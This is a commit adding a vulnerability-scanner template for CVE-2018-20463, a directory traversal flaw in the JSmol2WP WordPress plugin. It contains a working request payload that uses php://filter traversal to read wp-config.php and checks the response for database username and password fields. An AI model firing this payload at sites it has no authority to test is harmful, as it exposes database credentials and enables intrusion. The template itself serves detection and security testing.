Merge pull request #5163 from projectdiscovery/CVE-2018-20463

Create CVE-2018-20463.yaml
2022-08-21 14:07:04 +05:30 · 2022-08-21 14:07:04 +05:30 · 8d8f1c9668
parent 21faca575f bd419534de
commit 8d8f1c9668
1 changed files with 40 additions and 0 deletions
--- a/cves/2018/CVE-2018-20463.yaml
+++ b/cves/2018/CVE-2018-20463.yaml
@ -0,0 +1,40 @@
+id: CVE-2018-20463
+
+info:
+  name: JSmol2WP <= 1.07 - Directory Traversal
+  author: vinit989
+  severity: high
+  description: |
+    An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
+  reference:
+    - https://wpscan.com/vulnerability/9197
+    - https://wordpress.org/plugins/jsmol2wp/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20463
+  classification:
+    cve-id: CVE-2018-20463
+  metadata:
+    verified: true
+  tags: cve,cve2018,traversal,wp,wp-plugin,wordpress,jsmol2wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'DB_USER',"
+          - "'DB_PASSWORD'"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/plain
+
+      - type: status
+        status:
+          - 200